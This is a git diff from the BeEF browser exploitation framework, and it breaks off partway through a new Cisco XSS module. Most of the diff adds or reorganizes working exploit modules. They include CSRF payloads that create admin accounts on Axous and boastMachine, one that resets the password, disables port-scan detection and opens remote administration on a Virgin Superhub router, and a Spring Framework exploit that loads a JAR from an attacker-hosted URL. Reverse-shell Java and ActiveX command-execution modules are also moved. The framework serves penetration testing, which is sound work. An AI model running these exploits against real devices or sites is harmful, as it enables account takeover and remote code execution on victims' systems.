@@ -37,10 +37,10 @@ module BeEF
#2. call the "execute" method of the ruby module, passing the input
#3. update the input in order that next technique will work on the pre-processed input.
if File.exists?("#{$root_dir}/extensions/evasion/obfuscation/#{technique}.rb")
- print_debug "[OBFUSCATION] Applying technique [#{technique}]"
klass = BeEF::Extension::Evasion.const_get(technique.capitalize).instance
is_bootstrap_needed = klass.need_bootstrap
if is_bootstrap_needed
+ print_debug "[OBFUSCATION] Adding bootstrapper for technique [#{technique}]"
@bootstrap += klass.get_bootstrap
end
end
diff --git a/extensions/proxy/api.rb b/extensions/proxy/api.rb
index 96c67d586..13cf8dadf 100644
--- a/extensions/proxy/api.rb
+++ b/extensions/proxy/api.rb
@@ -14,33 +14,33 @@
# limitations under the License.
#
module BeEF
-module Extension
-module Proxy
-module API
+ module Extension
+ module Proxy
+ module API
- module RegisterHttpHandler
+ module RegisterHttpHandler
- BeEF::API::Registrar.instance.register(BeEF::Extension::Proxy::API::RegisterHttpHandler, BeEF::API::Server, 'pre_http_start')
- BeEF::API::Registrar.instance.register(BeEF::Extension::Proxy::API::RegisterHttpHandler, BeEF::API::Server, 'mount_handler')
-
- def self.pre_http_start(http_hook_server)
- config = BeEF::Core::Configuration.instance
- Thread.new{
- http_hook_server.semaphore.synchronize{
- BeEF::Extension::Proxy::Proxy.new
- }
- }
- print_success "HTTP Proxy: http://#{config.get('beef.extension.proxy.address')}:#{config.get('beef.extension.proxy.port')}"
+ BeEF::API::Registrar.instance.register(BeEF::Extension::Proxy::API::RegisterHttpHandler, BeEF::API::Server, 'pre_http_start')
+ BeEF::API::Registrar.instance.register(BeEF::Extension::Proxy::API::RegisterHttpHandler, BeEF::API::Server, 'mount_handler')
+
+ def self.pre_http_start(http_hook_server)
+ config = BeEF::Core::Configuration.instance
+ Thread.new{
+ http_hook_server.semaphore.synchronize{
+ BeEF::Extension::Proxy::Proxy.new
+ }
+ }
+ print_info "HTTP Proxy: http://#{config.get('beef.extension.proxy.address')}:#{config.get('beef.extension.proxy.port')}"
+ end
+
+ def self.mount_handler(beef_server)
+ beef_server.mount('/proxy', BeEF::Extension::Requester::Handler)
+ end
+
+ end
+
+
+ end
end
-
- def self.mount_handler(beef_server)
- beef_server.mount('/proxy', BeEF::Extension::Requester::Handler)
- end
-
end
-
-
-end
-end
-end
end
diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
index b4a20fe33..3aa49f32f 100644
--- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
+++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
@@ -24,7 +24,7 @@ beef:
target:
working:
S:
- os: ["iPhone"]
+ os: ["iOS"]
not_working:
ALL:
os: ["All"]
diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/command.js b/modules/exploits/axous_1_1_1_add_user_csrf/command.js
new file mode 100644
index 000000000..bfa12a6a6
--- /dev/null
+++ b/modules/exploits/axous_1_1_1_add_user_csrf/command.js
@@ -0,0 +1,40 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+ var base = '<%= @base %>';
+ var username = '<%= @username %>';
+ var password = '<%= @password %>';
+ var email = '<%= @email %>';
+
+ var axous_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
+ {'type':'hidden', 'name':'user_name', 'value':username},
+ {'type':'hidden', 'name':'new_passwd', 'value':password},
+ {'type':'hidden', 'name':'new_passwd1', 'value':password},
+ {'type':'hidden', 'name':'email', 'value':email},
+ {'type':'hidden', 'name':'dosubmit', 'value':'1'} ,
+ {'type':'hidden', 'name':'id', 'value':''},
+ {'type':'hidden', 'name':'action', 'value':'addnew'} ,
+ ]);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(axous_iframe);
+ }
+ setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
new file mode 100644
index 000000000..4231dc7e8
--- /dev/null
+++ b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ axous_add_user_csrf:
+ enable: true
+ category: "Exploits"
+ name: "Axous <= 1.1.1 Add User CSRF"
+ description: "Attempts to add a user to an Axous <= 1.1.1 install (CVE-2012-2629)."
+ authors: ["bcoles", "Ivano Binetti"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/module.rb b/modules/exploits/axous_1_1_1_add_user_csrf/module.rb
new file mode 100644
index 000000000..ba7f8e63e
--- /dev/null
+++ b/modules/exploits/axous_1_1_1_add_user_csrf/module.rb
@@ -0,0 +1,31 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Axous_add_user_csrf < BeEF::Core::Command
+
+ def self.options
+ return [
+ { 'name' => 'base', 'ui_label' => 'Axous URL', 'value' => 'http://target/admin/administrators_add.php'},
+ { 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'},
+ { 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'},
+ { 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/command.js b/modules/exploits/boastmachine_3_1_add_user_csrf/command.js
new file mode 100644
index 000000000..7e312ae66
--- /dev/null
+++ b/modules/exploits/boastmachine_3_1_add_user_csrf/command.js
@@ -0,0 +1,41 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+ var base = '<%= @base %>';
+ var username = '<%= @username %>';
+ var password = '<%= @password %>';
+ var email = '<%= @email %>';
+
+ var boastmachine_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
+ {'type':'hidden', 'name':'action', 'value':'add_user'},
+ {'type':'hidden', 'name':'do', 'value':'add'},
+ {'type':'hidden', 'name':'user_login', 'value':username},
+ {'type':'hidden', 'name':'user_pass', 'value':password},
+ {'type':'hidden', 'name':'user_name', 'value':username},
+ {'type':'hidden', 'name':'user_email', 'value':email},
+ {'type':'hidden', 'name':'blogs[]', 'value':'4'},
+ {'type':'hidden', 'name':'user_level', 'value':'4'},
+ ]);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(boastmachine_iframe);
+ }
+ setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml
new file mode 100644
index 000000000..f754f84f7
--- /dev/null
+++ b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ boastmachine_add_user_csrf:
+ enable: true
+ category: "Exploits"
+ name: "boastMachine <= 3.1 Add User CSRF"
+ description: "Attempts to add a user to a boastMachine <= 3.1 install."
+ authors: ["bcoles", "Dr.NaNo"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb b/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb
new file mode 100644
index 000000000..0fcdc068b
--- /dev/null
+++ b/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb
@@ -0,0 +1,31 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Boastmachine_add_user_csrf < BeEF::Core::Command
+
+ def self.options
+ return [
+ { 'name' => 'base', 'ui_label' => 'boastMachine URL', 'value' => 'http://target/bmc/admin.php?action=add_user&blog'},
+ { 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'},
+ { 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'},
+ { 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/activex_command_execution/command.js b/modules/exploits/local_host/activex_command_execution/command.js
similarity index 100%
rename from modules/exploits/activex_command_execution/command.js
rename to modules/exploits/local_host/activex_command_execution/command.js
diff --git a/modules/exploits/activex_command_execution/config.yaml b/modules/exploits/local_host/activex_command_execution/config.yaml
similarity index 95%
rename from modules/exploits/activex_command_execution/config.yaml
rename to modules/exploits/local_host/activex_command_execution/config.yaml
index 1e0995937..0a4d45a45 100755
--- a/modules/exploits/activex_command_execution/config.yaml
+++ b/modules/exploits/local_host/activex_command_execution/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
activex_command_execution:
enable: true
- category: "Exploits"
+ category: ["Exploits", "Local Host"]
name: "ActiveX Command Execution"
description: "Execute arbitrary commands using the \"WSCRIPT.Shell\" object. The command response is not returned to BeEF.
The browser must have \"Initialize and script ActiveX controls not marked as safe for scripting\" enabled."
authors: ["bcoles"]
diff --git a/modules/exploits/activex_command_execution/module.rb b/modules/exploits/local_host/activex_command_execution/module.rb
similarity index 100%
rename from modules/exploits/activex_command_execution/module.rb
rename to modules/exploits/local_host/activex_command_execution/module.rb
diff --git a/modules/exploits/java_payload/AppletReverseTCP-0.2.jar b/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar
similarity index 100%
rename from modules/exploits/java_payload/AppletReverseTCP-0.2.jar
rename to modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar
diff --git a/modules/exploits/java_payload/AppletReverseTCP-0.3rc1.jar b/modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar
similarity index 100%
rename from modules/exploits/java_payload/AppletReverseTCP-0.3rc1.jar
rename to modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar
diff --git a/modules/exploits/java_payload/command.js b/modules/exploits/local_host/java_payload/command.js
similarity index 100%
rename from modules/exploits/java_payload/command.js
rename to modules/exploits/local_host/java_payload/command.js
diff --git a/modules/exploits/java_payload/config.yaml b/modules/exploits/local_host/java_payload/config.yaml
similarity index 96%
rename from modules/exploits/java_payload/config.yaml
rename to modules/exploits/local_host/java_payload/config.yaml
index 0d58413ba..651dedb7b 100755
--- a/modules/exploits/java_payload/config.yaml
+++ b/modules/exploits/local_host/java_payload/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
java_payload:
enable: true
- category: "Exploits"
+ category: ["Exploits", "Local Host"]
name: "Java Payload"
description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.
Before launching it, be sure to have the JavaPayload StagerHandler listening,
i.e.: java javapayload.handler.stager.StagerHandler <payload> <IP> <port> -- JSh
Windows Vista is not supported."
authors: ["antisnatchor"]
diff --git a/modules/exploits/java_payload/module.rb b/modules/exploits/local_host/java_payload/module.rb
similarity index 100%
rename from modules/exploits/java_payload/module.rb
rename to modules/exploits/local_host/java_payload/module.rb
diff --git a/modules/exploits/mozilla_nsiprocess_interface/command.js b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
similarity index 100%
rename from modules/exploits/mozilla_nsiprocess_interface/command.js
rename to modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
diff --git a/modules/exploits/mozilla_nsiprocess_interface/config.yaml b/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml
similarity index 96%
rename from modules/exploits/mozilla_nsiprocess_interface/config.yaml
rename to modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml
index 7e1b71cd2..730bb4c79 100644
--- a/modules/exploits/mozilla_nsiprocess_interface/config.yaml
+++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
mozilla_nsiprocess_interface:
enable: false
- category: "Exploits"
+ category: ["Exploits", "Local Host"]
name: "Mozilla nsIProcess XPCOM Interface (Windows)"
description: "The nsIProcess XPCOM interface represents an executable process. JavaScript code with chrome privileges can use the nsIProcess interface to launch executable files. In this module, nsIProcess is combined with the Windows command prompt cmd.exe
Any XSS injection in a chrome privileged zone (e.g. typically in Firefox extensions) allows this module to execute arbitrary commands on the victim machine."
authors: ["wade", "bcoles", "roberto.suggi@security-assessment.com", "nick.freeman@security-assessment.com"]
diff --git a/modules/exploits/mozilla_nsiprocess_interface/module.rb b/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
similarity index 100%
rename from modules/exploits/mozilla_nsiprocess_interface/module.rb
rename to modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
diff --git a/modules/exploits/safari_launch_app/command.js b/modules/exploits/local_host/safari_launch_app/command.js
similarity index 100%
rename from modules/exploits/safari_launch_app/command.js
rename to modules/exploits/local_host/safari_launch_app/command.js
diff --git a/modules/exploits/safari_launch_app/config.yaml b/modules/exploits/local_host/safari_launch_app/config.yaml
similarity index 95%
rename from modules/exploits/safari_launch_app/config.yaml
rename to modules/exploits/local_host/safari_launch_app/config.yaml
index ba9de7df2..13200a95d 100755
--- a/modules/exploits/safari_launch_app/config.yaml
+++ b/modules/exploits/local_host/safari_launch_app/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
safari_launch_app:
enable: true
- category: "Exploits"
+ category: ["Exploits", "Local Host"]
name: "Safari Launch App"
description: "Launch an application from the victim machine.
See CVE-2011-3230 for more details.
Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel."
authors: ["antisnatchor"]
diff --git a/modules/exploits/safari_launch_app/module.rb b/modules/exploits/local_host/safari_launch_app/module.rb
similarity index 100%
rename from modules/exploits/safari_launch_app/module.rb
rename to modules/exploits/local_host/safari_launch_app/module.rb
diff --git a/modules/exploits/window_mail_client_dos/command.js b/modules/exploits/local_host/window_mail_client_dos/command.js
similarity index 100%
rename from modules/exploits/window_mail_client_dos/command.js
rename to modules/exploits/local_host/window_mail_client_dos/command.js
diff --git a/modules/exploits/window_mail_client_dos/config.yaml b/modules/exploits/local_host/window_mail_client_dos/config.yaml
similarity index 96%
rename from modules/exploits/window_mail_client_dos/config.yaml
rename to modules/exploits/local_host/window_mail_client_dos/config.yaml
index 891f16919..25a643768 100644
--- a/modules/exploits/window_mail_client_dos/config.yaml
+++ b/modules/exploits/local_host/window_mail_client_dos/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
windows_mail_client_dos:
enable: true
- category: "Exploits"
+ category: ["Exploits", "Local Host"]
name: "Windows Mail Client DoS"
description: "This module exploits an unhandled exception in Windows Mail to crash the client remotely.
Windows Mail is launched and then crashed if it is not already open. It comes installed by default on Windows Vista (but it's also vulnerable on Windows 7 SP2).
The protocol handler used will be: nntp."
authors: ["bcoles"]
diff --git a/modules/exploits/window_mail_client_dos/module.rb b/modules/exploits/local_host/window_mail_client_dos/module.rb
similarity index 100%
rename from modules/exploits/window_mail_client_dos/module.rb
rename to modules/exploits/local_host/window_mail_client_dos/module.rb
diff --git a/modules/exploits/router/comtrend_ct5367_csrf/command.js b/modules/exploits/router/comtrend_ct5367_csrf/command.js
index fdbedec46..d713b6b06 100644
--- a/modules/exploits/router/comtrend_ct5367_csrf/command.js
+++ b/modules/exploits/router/comtrend_ct5367_csrf/command.js
@@ -18,12 +18,12 @@ beef.execute(function() {
var passwd = '<%= @password %>';
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
- ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
+ ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
var form = document.createElement('form');
- form.setAttribute('action', gateway + "/password.cgi");
+ form.setAttribute('action', gateway + "password.cgi");
form.setAttribute('method', 'post');
var input = null;
diff --git a/modules/exploits/router/comtrend_ct5624_csrf/command.js b/modules/exploits/router/comtrend_ct5624_csrf/command.js
index b6cc7ab28..afe248983 100644
--- a/modules/exploits/router/comtrend_ct5624_csrf/command.js
+++ b/modules/exploits/router/comtrend_ct5624_csrf/command.js
@@ -18,7 +18,7 @@ beef.execute(function() {
var passwd = '<%= @password %>';
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
- ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
+ ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
diff --git a/modules/exploits/router/dlink_dsl500t_csrf/command.js b/modules/exploits/router/dlink_dsl500t_csrf/command.js
index ae1c98e23..f25c89a5b 100644
--- a/modules/exploits/router/dlink_dsl500t_csrf/command.js
+++ b/modules/exploits/router/dlink_dsl500t_csrf/command.js
@@ -17,7 +17,7 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
- var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi-bin/webcm", "POST",
+ var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
[{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
{'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
{'type':'hidden', 'name':'security:settings/password', 'value':passwd},
diff --git a/modules/exploits/router/huawei_smartax_mt880/command.js b/modules/exploits/router/huawei_smartax_mt880/command.js
index a749117a8..bfe98e957 100644
--- a/modules/exploits/router/huawei_smartax_mt880/command.js
+++ b/modules/exploits/router/huawei_smartax_mt880/command.js
@@ -19,7 +19,7 @@ beef.execute(function() {
var passwd = '<%= @password %>';
var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe();
- huawei_smartax_mt880_iframe.setAttribute('src', gateway+"/Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
+ huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
diff --git a/modules/exploits/router/virgin_superhub_csrf/command.js b/modules/exploits/router/virgin_superhub_csrf/command.js
new file mode 100644
index 000000000..fb0ed4ca4
--- /dev/null
+++ b/modules/exploits/router/virgin_superhub_csrf/command.js
@@ -0,0 +1,47 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ var gateway = '<%= @base %>';
+ var passwd = '<%= @password %>';
+ var port = '<%= @port %>';
+
+ var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
+ {'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
+ {'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
+ {'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
+ ]);
+
+ var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
+ {'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
+ ]);
+
+ var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
+ {'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
+ {'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
+ ]);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(virgin_superhub_iframe1);
+ document.body.removeChild(virgin_superhub_iframe2);
+ document.body.removeChild(virgin_superhub_iframe3);
+ }
+ setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/router/virgin_superhub_csrf/config.yaml b/modules/exploits/router/virgin_superhub_csrf/config.yaml
new file mode 100644
index 000000000..e767d9fef
--- /dev/null
+++ b/modules/exploits/router/virgin_superhub_csrf/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ virgin_superhub_csrf:
+ enable: true
+ category: ["Exploits", "Router"]
+ name: "Virgin Superhub CSRF"
+ description: "Attempts to enable remote administration, disable the firewall, and change the admin password on a Virgin Superhub router."
+ authors: ["bcoles", "n0x00"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/router/virgin_superhub_csrf/module.rb b/modules/exploits/router/virgin_superhub_csrf/module.rb
new file mode 100644
index 000000000..83599490c
--- /dev/null
+++ b/modules/exploits/router/virgin_superhub_csrf/module.rb
@@ -0,0 +1,30 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Virgin_superhub_csrf < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.100.1/'},
+ {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'},
+ {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/spring_framework_malicious_jar/command.js b/modules/exploits/spring_framework_malicious_jar/command.js
new file mode 100644
index 000000000..00804c652
--- /dev/null
+++ b/modules/exploits/spring_framework_malicious_jar/command.js
@@ -0,0 +1,32 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ jar_file = "<%= @jar_file %>";
+ form_controller = "<%= @form_controller %>";
+
+ uri = form_controller+"?class.classLoader.URLs[0]=jar:"+jar_file;
+ var spring_iframe = beef.dom.createInvisibleIframe();
+ spring_iframe.setAttribute('src', uri);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(spring_iframe);
+ }
+ setTimeout("cleanup()", 15000);
+
+});
diff --git a/modules/exploits/spring_framework_malicious_jar/config.yaml b/modules/exploits/spring_framework_malicious_jar/config.yaml
new file mode 100644
index 000000000..1dbaace8f
--- /dev/null
+++ b/modules/exploits/spring_framework_malicious_jar/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ spring_framework_malicious_jar:
+ enable: true
+ category: "Exploits"
+ name: "Spring Framework Malicious Jar Exploit"
+ description: "Execute a malicious JAR file using the Spring Framework 'class.classloader' vulnerability (CVE-2010-1622).
Specify the URL for a form controller on the target and the URL for your malicious JAR file.
For more information see: http://www.exploit-db.com/exploits/13918/
Versions Affected:
3.0.0 to 3.0.2
2.5.0 to 2.5.6.SEC01 (community releases)
2.5.0 to 2.5.7 (subscription customers)"
+ authors: ["bcoles"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/spring_framework_malicious_jar/module.rb b/modules/exploits/spring_framework_malicious_jar/module.rb
new file mode 100644
index 000000000..f1777b7f5
--- /dev/null
+++ b/modules/exploits/spring_framework_malicious_jar/module.rb
@@ -0,0 +1,29 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Spring_framework_malicious_jar < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'form_controller', 'ui_label' => 'Form Controller URL', 'value' => 'http://target/path/to/form/controller'},
+ {'name' => 'jar_file', 'ui_label' => 'Malicious JAR file URL', 'value' => 'http://attacker/path/to/attack.jar!/'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
new file mode 100644
index 000000000..81933f79a
--- /dev/null
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
@@ -0,0 +1,26 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
